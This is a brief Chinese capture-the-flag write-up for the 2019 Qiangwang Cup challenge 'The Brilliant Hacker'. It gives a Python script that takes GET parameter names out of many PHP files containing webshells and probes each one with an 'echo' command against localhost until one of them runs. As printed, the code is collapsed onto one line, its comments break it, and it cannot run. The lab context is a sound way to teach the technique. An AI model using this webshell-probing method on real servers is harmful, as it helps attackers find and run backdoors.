[強網杯 2019]高明的黑客
阿新 • • 發佈:2021-08-25
下載備份檔案,每個檔案都有shell,但是好多都不能用,
所以需要py指令碼篩選可用的shell,搬移一個大佬的wp
import re import os import requests files = os.listdir('src/') #獲取路徑下的所有檔案 reg = re.compile(r'(?<=_GET\[\').*(?=\'\])') #設定正則 for i in files: #從第一個檔案開始 url = "http://127.0.0.1/src/" + i f = open("src/"+i) #開啟這個檔案data = f.read() #讀取檔案內容 f.close() #關閉檔案 result = reg.findall(data) #從檔案中找到GET請求 for j in result: #從第一個GET引數開始 payload = url + "?" + j + "=echo 123456" ##嘗試請求次路徑,並執行命令 print(payload) html = requests.get(payload)##通過r=request.get(url)構造一個向伺服器請求資源的url物件。if "123456" in html.text: print(payload) exit(1)
考察的還是指令碼編寫。好好理解這個